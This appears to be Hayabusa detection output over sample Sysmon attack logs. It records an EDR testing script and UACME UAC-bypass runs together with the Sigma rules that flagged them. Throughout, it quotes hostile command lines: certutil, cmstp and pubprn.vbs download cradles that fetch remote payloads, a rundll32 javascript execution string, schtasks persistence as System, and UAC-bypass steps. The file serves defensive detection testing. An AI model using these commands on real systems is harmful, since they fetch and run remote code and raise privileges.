+2019-07-30 06:34:15.252 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: timeout 5 | Process: C:\Windows\System32\timeout.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 2296 | PGUID: 747F3D96-6657-5D3F-0000-0010D01A8D00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:34:15.658 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32.exe javascript:""\..\mshtml,RunHTMLApplication "";document.write();h=new0ActiveXObject(""WScript.Shell"").run(""calc.exe"",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new0ActiveXObject(""WScript.Shell"").Run(""cmd /c taskkill /f /im rundll32.exe && exit"",0,true);} | Process: C:\Windows\System32\rundll32.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c rundll32.exe javascript:""\..\mshtml,RunHTMLApplication "";document.write();h=new0ActiveXObject(""WScript.Shell"").run(""calc.exe"",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new0ActiveXObject(""WScript.Shell"").Run(""cmd /c taskkill /f /im rundll32.exe && exit"",0,true);} | LID: 0x413182 | PID: 1004 | PGUID: 747F3D96-6657-5D3F-0000-001011298D00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:34:15.658 +09:00,MSEDGEWIN10,1,medium,Evas,Suspicious Rundll32 Script in CommandLine,,rules/sigma/process_creation/proc_creation_win_susp_rundll32_script_run.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:34:15.658 +09:00,MSEDGEWIN10,1,high,,Application Executed Non-Executable Extension,,rules/sigma/process_creation/proc_creation_win_run_executable_invalid_extension.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:34:20.238 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c certutil.exe -urlcache -split -f https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt Default_File_Path2.ps1 | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 7088 | PGUID: 747F3D96-665C-5D3F-0000-0010096B8D00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:34:20.238 +09:00,MSEDGEWIN10,1,high,Evas | C2,Suspicious Certutil Command,,rules/sigma/process_creation/proc_creation_win_susp_certutil_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:34:20.262 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: timeout 5 | Process: C:\Windows\System32\timeout.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 3076 | PGUID: 747F3D96-665C-5D3F-0000-0010DC6B8D00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:34:20.459 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: certutil.exe -urlcache -split -f https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt Default_File_Path2.ps1 | Process: C:\Windows\System32\certutil.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c certutil.exe -urlcache -split -f https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt Default_File_Path2.ps1 | LID: 0x413182 | PID: 4520 | PGUID: 747F3D96-665C-5D3F-0000-0010E37B8D00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:34:20.459 +09:00,MSEDGEWIN10,1,high,Evas | C2,Suspicious Certutil Command,,rules/sigma/process_creation/proc_creation_win_susp_certutil_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:34:21.867 +09:00,MSEDGEWIN10,3,medium,,Network Connection_Sysmon Alert,Suspicious NetCon | tcp | Src: 10.0.2.15:49832 (MSEDGEWIN10.home) | Dst: 151.101.0.133:443 () | User: MSEDGEWIN10\IEUser | Process: C:\Windows\System32\certutil.exe | PID: 4520 | PGUID: 747F3D96-665C-5D3F-0000-0010E37B8D00,rules/hayabusa/sysmon/alerts/3_NetworkConnection_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:34:21.867 +09:00,MSEDGEWIN10,3,medium,,Network Connection_Sysmon Alert,Suspicious NetCon | tcp | Src: 10.0.2.15:49833 (MSEDGEWIN10.home) | Dst: 151.101.0.133:443 () | User: MSEDGEWIN10\IEUser | Process: C:\Windows\System32\certutil.exe | PID: 4520 | PGUID: 747F3D96-665C-5D3F-0000-0010E37B8D00,rules/hayabusa/sysmon/alerts/3_NetworkConnection_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:34:25.202 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c cmstp.exe /ni /s https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp.inf | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 6428 | PGUID: 747F3D96-6661-5D3F-0000-00107AB88D00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:34:25.269 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: timeout 5 | Process: C:\Windows\System32\timeout.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 5888 | PGUID: 747F3D96-6661-5D3F-0000-00103CBD8D00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:34:25.659 +09:00,MSEDGEWIN10,1,high,PrivEsc | Evas,Bypass UAC via CMSTP,,rules/sigma/process_creation/proc_creation_win_uac_cmstp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:34:25.659 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: cmstp.exe /ni /s https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp.inf | Process: C:\Windows\System32\cmstp.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c cmstp.exe /ni /s https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp.inf | LID: 0x413182 | PID: 6820 | PGUID: 747F3D96-6661-5D3F-0000-0010CBC88D00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:34:30.237 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 2244 | PGUID: 747F3D96-6666-5D3F-0000-001016F78D00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:34:30.258 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: timeout 5 | Process: C:\Windows\System32\timeout.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 4976 | PGUID: 747F3D96-6666-5D3F-0000-0010C6F88D00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:34:30.685 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe | Process: C:\Windows\System32\forfiles.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe | LID: 0x413182 | PID: 1464 | PGUID: 747F3D96-6666-5D3F-0000-0010AE068E00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:34:30.807 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\calc.exe"" | Process: C:\Windows\System32\calc.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe | LID: 0x413182 | PID: 4336 | PGUID: 747F3D96-6666-5D3F-0000-0010DF098E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:34:30.807 +09:00,MSEDGEWIN10,1,low,Evas,Indirect Command Execution,,rules/sigma/process_creation/proc_creation_win_indirect_cmd.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:34:35.313 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c winrm qc -q | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 5840 | PGUID: 747F3D96-666B-5D3F-0000-001051638E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:34:35.337 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c winrm i c wmicimv2/Win32_Process @{CommandLine=""calc""} | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 1580 | PGUID: 747F3D96-666B-5D3F-0000-001033648E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:34:35.347 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: timeout 5 | Process: C:\Windows\System32\timeout.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 6412 | PGUID: 747F3D96-666B-5D3F-0000-00107C668E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:34:35.838 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cscript //nologo ""C:\Windows\System32\winrm.vbs"" qc -q | Process: C:\Windows\System32\cscript.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c winrm qc -q | LID: 0x413182 | PID: 3224 | PGUID: 747F3D96-666B-5D3F-0000-00102F7F8E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:34:35.838 +09:00,MSEDGEWIN10,1,medium,Exec,Cscript Visual Basic Script Execution,,rules/sigma/process_creation/proc_creation_win_susp_cscript_vbs.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:34:35.878 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cscript //nologo ""C:\Windows\System32\winrm.vbs"" i c wmicimv2/Win32_Process @{CommandLine=""calc""} | Process: C:\Windows\System32\cscript.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c winrm i c wmicimv2/Win32_Process @{CommandLine=""calc""} | LID: 0x413182 | PID: 264 | PGUID: 747F3D96-666B-5D3F-0000-0010EF858E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:34:35.878 +09:00,MSEDGEWIN10,1,medium,Exec,Cscript Visual Basic Script Execution,,rules/sigma/process_creation/proc_creation_win_susp_cscript_vbs.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:34:36.421 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"Execution - Suspicious Microsoft.XMLDOM module load | Image: C:\Windows\System32\msxml3.dll | Process: C:\Windows\System32\cscript.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 3224 | PGUID: 747F3D96-666B-5D3F-0000-00102F7F8E00 | Hash: SHA1=23805C325D9D4F0A3467F6D2A402A259C376A7F0,MD5=D1B65A6CC7A53A0B68BEE51C639E8F01,SHA256=C948999A3823DA8EBA679F15ABAAEB5E057C91EB716A9DBF9F97FFD09E96CBF7,IMPHASH=2E1D1E35C17BE5497D2DE33F06DC41B4",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:34:36.534 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: calc | Process: C:\Windows\System32\calc.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding | LID: 0x413182 | PID: 3872 | PGUID: 747F3D96-666C-5D3F-0000-00104BB78E00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:34:36.534 +09:00,MSEDGEWIN10,1,high,Exec,Wmiprvse Spawning Process,,rules/sigma/process_creation/proc_creation_win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:34:36.548 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"Execution - Suspicious Microsoft.XMLDOM module load | Image: C:\Windows\System32\msxml3.dll | Process: C:\Windows\System32\cscript.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 264 | PGUID: 747F3D96-666B-5D3F-0000-0010EF858E00 | Hash: SHA1=23805C325D9D4F0A3467F6D2A402A259C376A7F0,MD5=D1B65A6CC7A53A0B68BEE51C639E8F01,SHA256=C948999A3823DA8EBA679F15ABAAEB5E057C91EB716A9DBF9F97FFD09E96CBF7,IMPHASH=2E1D1E35C17BE5497D2DE33F06DC41B4",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:34:40.261 +09:00,MSEDGEWIN10,1,high,Evas,Suspicious Calculator Usage,,rules/sigma/process_creation/proc_creation_win_susp_calc.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:34:40.261 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c schtasks /create /tn ""mysc"" /tr C:\windows\system32\calc.exe /sc ONLOGON /ru ""System"" /f | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 2916 | PGUID: 747F3D96-6670-5D3F-0000-001099048F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:34:40.385 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: timeout 5 | Process: C:\Windows\System32\timeout.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 4720 | PGUID: 747F3D96-6670-5D3F-0000-00105F098F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:34:40.889 +09:00,MSEDGEWIN10,1,high,,Process Created_Sysmon Alert,"Persistence - Scheduled Task Management | Cmd: schtasks /create /tn ""mysc"" /tr C:\windows\system32\calc.exe /sc ONLOGON /ru ""System"" /f | Process: C:\Windows\System32\schtasks.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c schtasks /create /tn ""mysc"" /tr C:\windows\system32\calc.exe /sc ONLOGON /ru ""System"" /f | LID: 0x413182 | PID: 7076 | PGUID: 747F3D96-6670-5D3F-0000-0010F9148F00 | Hash: SHA1=112C8FFA1C0934ACAAD2C58B3C7E81F3FB8E4A2C,MD5=3F9FD6D3B3E96B8F576DB72035DB38A7,SHA256=D6BA2CD73799477C051D9D864C47FCF5108064CDE07D3565871AFA10FC548086,IMPHASH=7EE4BC5589713B3470B8A950256E2E69",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:34:40.889 +09:00,MSEDGEWIN10,1,high,Evas,Suspicious Calculator Usage,,rules/sigma/process_creation/proc_creation_win_susp_calc.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:34:40.889 +09:00,MSEDGEWIN10,1,low,Exec | Persis | PrivEsc,Scheduled Task Creation,,rules/sigma/process_creation/proc_creation_win_susp_schtask_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:34:41.793 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\Tasks\mysc | Process: C:\Windows\system32\svchost.exe | PID: 1028 | PGUID: 747F3D96-DCFE-5D3F-0000-001044D20000,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:34:45.242 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c cscript /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs 127.0.0.1 script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test.sct | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 4184 | PGUID: 747F3D96-6675-5D3F-0000-0010AA498F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:34:45.311 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: timeout 5 | Process: C:\Windows\System32\timeout.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 6192 | PGUID: 747F3D96-6675-5D3F-0000-0010774E8F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:34:45.606 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: cscript /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs 127.0.0.1 script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test.sct | Process: C:\Windows\System32\cscript.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c cscript /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs 127.0.0.1 script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test.sct | LID: 0x413182 | PID: 4036 | PGUID: 747F3D96-6675-5D3F-0000-0010875C8F00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:34:45.606 +09:00,MSEDGEWIN10,1,medium,Exec,Cscript Visual Basic Script Execution,,rules/sigma/process_creation/proc_creation_win_susp_cscript_vbs.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-08-03 18:46:48.209 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: UACME.exe 34 | Process: C:\Users\IEUser\Desktop\UACME.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x18d3fb | PID: 924 | PGUID: 747F3D96-5808-5D45-0000-00106CDC3E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_34.evtx
+2019-08-03 18:46:48.209 +09:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Tool UACMe,,rules/sigma/process_creation/proc_creation_win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_34.evtx
+2019-08-03 18:46:48.209 +09:00,MSEDGEWIN10,1,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_34.evtx
+2019-08-03 18:46:48.726 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,"PrivEsc - UAC bypass UACME-34 | SetValue: HKU\S-1-5-21-3461203602-4096304019-2269080069-1000\Environment\windir: ""C:\Windows\system32\cmd.exe"" | Process: C:\Windows\explorer.exe | PID: 924 | PGUID: 747F3D96-5808-5D45-0000-00106CDC3E00",rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_34.evtx
+2019-08-03 18:46:48.924 +09:00,MSEDGEWIN10,1,high,,Process Created_Sysmon Alert,"Persistence - Scheduled Task Management | Cmd: ""C:\Windows\System32\schtasks.exe"" /run /tn ""\Microsoft\Windows\DiskCleanup\SilentCleanup"" /i | Process: C:\Windows\System32\schtasks.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 34 | LID: 0x18d3fb | PID: 1268 | PGUID: 747F3D96-5808-5D45-0000-0010D1FE3E00 | Hash: SHA1=112C8FFA1C0934ACAAD2C58B3C7E81F3FB8E4A2C,MD5=3F9FD6D3B3E96B8F576DB72035DB38A7,SHA256=D6BA2CD73799477C051D9D864C47FCF5108064CDE07D3565871AFA10FC548086,IMPHASH=7EE4BC5589713B3470B8A950256E2E69",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_34.evtx
+2019-08-03 18:46:49.402 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe""\system32\cleanmgr.exe /autoclean /d C: | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule | LID: 0x18d3b3 | PID: 1380 | PGUID: 747F3D96-5809-5D45-0000-00100B233F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_34.evtx
+2019-08-03 18:46:49.402 +09:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Using Disk Cleanup,,rules/sigma/process_creation/proc_creation_win_uac_bypass_cleanmgr.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_34.evtx
+2019-08-03 18:46:49.436 +09:00,MSEDGEWIN10,12,medium,,Registry Key Create/Delete_Sysmon Alert,PrivEsc - UAC bypass UACME-34 | DeleteValue: HKU\S-1-5-21-3461203602-4096304019-2269080069-1000\Environment\windir | Process: C:\Windows\explorer.exe | PID: 924 | PGUID: 747F3D96-5808-5D45-0000-00106CDC3E00,rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_34.evtx
+2019-08-03 18:46:49.502 +09:00,MSEDGEWIN10,5,info,,Process Terminated,Process: C:\Users\IEUser\Desktop\UACME.exe | PID: 924 | PGUID: 747F3D96-5808-5D45-0000-00106CDC3E00,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_34.evtx
+2019-08-03 19:14:02.589 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: UACME.exe 33 | Process: C:\Users\IEUser\Desktop\UACME.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x18d3fb | PID: 4440 | PGUID: 747F3D96-5E6A-5D45-0000-001076639D00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx
+2019-08-03 19:14:02.589 +09:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Tool UACMe,,rules/sigma/process_creation/proc_creation_win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx
+2019-08-03 19:14:02.589 +09:00,MSEDGEWIN10,1,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx
